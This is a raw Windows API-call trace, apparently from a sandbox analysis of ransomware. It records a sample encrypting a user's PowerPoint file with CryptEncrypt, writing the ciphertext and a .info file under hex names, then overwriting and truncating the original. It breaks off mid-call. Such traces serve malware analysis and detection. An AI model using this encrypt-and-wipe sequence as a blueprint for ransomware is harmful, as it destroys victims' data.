CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.375] CryptDuplicateKey (in: hKey=0x1a626b40, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626de0) returned 1 [0075.375] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.375] CryptSetKeyParam (hKey=0x1a626de0, dwParam=0x4, pbData=0x21bd5d8*=0x1, dwFlags=0x0) returned 1 [0075.376] CryptSetKeyParam (hKey=0x1a626de0, dwParam=0x1, pbData=0x21bd588, dwFlags=0x0) returned 1 [0075.376] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0075.376] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0075.376] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi3qd09uyx pa91lnj.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.376] GetFileType (hFile=0x36c) returned 0x1 [0075.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.376] GetFileType (hFile=0x36c) returned 0x1 [0075.376] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D", lpFilePart=0x0) returned 0x48 [0075.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a606225924f93eadb626be09ddb49e4d"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.376] GetFileType (hFile=0x358) returned 0x1 [0075.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.377] GetFileType (hFile=0x358) returned 0x1 [0075.377] ReadFile (in: hFile=0x36c, lpBuffer=0x21bd9b8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x21bd9b8*, lpNumberOfBytesRead=0x1bf5da28*=0xdb0c, lpOverlapped=0x0) returned 1 [0075.378] CryptEncrypt (in: hKey=0x1a626de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21d19d0*, pdwDataLen=0x1bf5da80*=0xdb00, dwBufLen=0xdb00 | out: pbData=0x21d19d0*, pdwDataLen=0x1bf5da80*=0xdb00) returned 1 [0075.378] WriteFile (in: hFile=0x358, lpBuffer=0x21d19d0*, nNumberOfBytesToWrite=0xdb00, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x21d19d0*, lpNumberOfBytesWritten=0x1bf5da18*=0xdb00, lpOverlapped=0x0) returned 1 [0075.380] ReadFile (in: hFile=0x36c, lpBuffer=0x21bd9b8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x21bd9b8*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.380] CryptEncrypt (in: hKey=0x1a626de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21df510*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x21df510*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.380] CryptEncrypt (in: hKey=0x1a626de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x21df560*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x21df560*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.380] WriteFile (in: hFile=0x358, lpBuffer=0x21df5b0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x21df5b0*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.380] CloseHandle (hObject=0x358) returned 1 [0075.381] CloseHandle (hObject=0x36c) returned 1 [0075.381] CryptDestroyKey (hKey=0x4ce9f0) returned 1 [0075.381] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0075.381] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0075.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D", lpFilePart=0x0) returned 0x48 [0075.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a606225924f93eadb626be09ddb49e4d"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.382] GetFileType (hFile=0x36c) returned 0x1 [0075.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.382] GetFileType (hFile=0x36c) returned 0x1 [0075.382] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.383] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.384] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.385] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.386] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.386] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.386] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.386] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.387] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.387] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.387] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.387] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.387] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.387] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0xb10, lpOverlapped=0x0) returned 1 [0075.387] ReadFile (in: hFile=0x36c, lpBuffer=0x21e0ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x21e0ca8*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.387] CloseHandle (hObject=0x36c) returned 1 [0075.389] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D.info", lpFilePart=0x0) returned 0x4d [0075.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a606225924f93eadb626be09ddb49e4d.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.389] GetFileType (hFile=0x36c) returned 0x1 [0075.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.389] GetFileType (hFile=0x36c) returned 0x1 [0075.390] WriteFile (in: hFile=0x36c, lpBuffer=0x21ed368*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x21ed368*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.390] CloseHandle (hObject=0x36c) returned 1 [0075.391] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.391] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi3qd09uyx pa91lnj.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1421ddd0, ftCreationTime.dwHighDateTime=0x1d4cddc, ftLastAccessTime.dwLowDateTime=0x1757bea0, ftLastAccessTime.dwHighDateTime=0x1d4d4e6, ftLastWriteTime.dwLowDateTime=0x1757bea0, ftLastWriteTime.dwHighDateTime=0x1d4d4e6, nFileSizeHigh=0x0, nFileSizeLow=0xdb0c)) returned 1 [0075.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.391] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.392] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", dwFileAttributes=0x80) returned 1 [0075.392] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.392] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi3qd09uyx pa91lnj.pptx"), fInfoLevelId=0x0, lpFileInformation=0x21f4f80 | out: lpFileInformation=0x21f4f80*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1421ddd0, ftCreationTime.dwHighDateTime=0x1d4cddc, ftLastAccessTime.dwLowDateTime=0x1757bea0, ftLastAccessTime.dwHighDateTime=0x1d4d4e6, ftLastWriteTime.dwLowDateTime=0x1757bea0, ftLastWriteTime.dwHighDateTime=0x1d4d4e6, nFileSizeHigh=0x0, nFileSizeLow=0xdb0c)) returned 1 [0075.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.392] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi3qd09uyx pa91lnj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.392] GetFileType (hFile=0x36c) returned 0x1 [0075.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.392] GetFileType (hFile=0x36c) returned 0x1 [0075.392] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.393] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.394] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.399] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.400] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.401] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.402] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.402] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.403] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.404] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.405] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.405] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.406] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.407] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.407] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5daa8*=0xc00, lpOverlapped=0x0) returned 1 [0075.407] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.408] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.409] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.410] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.411] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.411] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.412] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.413] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.414] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.414] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.415] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.416] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.416] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.417] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.418] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5daa8*=0xc00, lpOverlapped=0x0) returned 1 [0075.418] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.419] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.419] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.420] WriteFile (in: hFile=0x36c, lpBuffer=0x21f5468*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21f5468*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.421] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.422] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.422] SetEndOfFile (hFile=0x36c) returned 1 [0075.423] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.423] CloseHandle (hObject=0x36c) returned 1 [0075.423] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.423] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi3qd09uyx pa91lnj.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.423] GetFileType (hFile=0x36c) returned 0x1 [0075.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.423] GetFileType (hFile=0x36c) returned 0x1 [0075.423] SetFileTime 